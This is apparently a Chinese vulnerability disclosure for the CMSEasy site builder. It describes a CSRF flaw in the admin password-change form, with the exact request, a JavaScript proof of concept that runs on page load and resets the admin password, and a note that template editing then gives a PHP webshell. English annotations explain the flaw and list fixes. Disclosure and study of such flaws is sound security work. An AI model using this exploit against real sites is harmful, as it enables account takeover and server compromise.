### 简要描述:
Cmseasy建站系统csrf获取管理权限后台getshell
### 详细说明:
后台修改管理员密码处存在 CSRF 漏洞：
http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default
POST 数据:
onlymodify=&username=admin&passwordnew=456456&nickname=%E7%AE%A1%E7%90%86%E5%91%98&question=&answer=&groupid=2&qq=0&e_mail=&tel=&submit=%E6%8F%90%E4%BA%A4
以下页面脚本可通过 CSRF 修改管理员密码:
```
// Proof-of-concept as posted.  The password-change endpoint accepts the request on
// the strength of the session cookie alone: the POST body contains no anti-CSRF
// token field, and nothing else in the request proves the user intended it.
function ajax(){
// Returns a native XMLHttpRequest, or a legacy ActiveX XMLHTTP object on old IE.
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
// No `break`: every ProgID is tried in turn and the last one that constructs
// wins; construction failures are silently swallowed.
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}var _x = ajax(); // module-level request object shared by xhr_act()
postgo(); // runs as soon as the script is parsed; the victim takes no action
function postgo() {
// Replays the password-change request quoted in the report, verbatim.
// `src` and `data` are implicit globals (no var/let).
src="http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default";
data="onlymodify=&username=admin&passwordnew=456456&nickname=%E7%AE%A1%E7%90%86%E5%91%98&question=&answer=&groupid=2&qq=0&e_mail=&tel=&submit=%E6%8F%90%E4%BA%A4"
xhr_act("POST",src,data);
}
function xhr_act(_m,_s,_a){
// Synchronous request (third argument `false`), so responseText is
// available right after send().
_x.open(_m,_s,false);
cookie = document.cookie; // implicit global
if(_m=="POST"){
_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// `Cookie` is a forbidden request-header name for XMLHttpRequest, so browsers
// ignore this call; the session cookie is attached by the browser itself.  That
// automatic attachment is the CSRF problem.  Server-side fix: validate a
// per-session CSRF token on this form, require the current password for any
// password change, mark the session cookie SameSite, and check Origin/Referer.
_x.setRequestHeader("Cookie",cookie);
}
_x.send(_a);
return _x.responseText;
}
```
取得后台权限后，编辑模板时插入 PHP 代码即可 getshell。
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201408/071655212230bde338ce0e10c040a13194325114.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/071655212230bde338ce0e10c040a13194325114.jpg)
[<img src="https://images.seebug.org/upload/201408/07165534389772af43d107660645d01df58e5090.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/07165534389772af43d107660645d01df58e5090.jpg)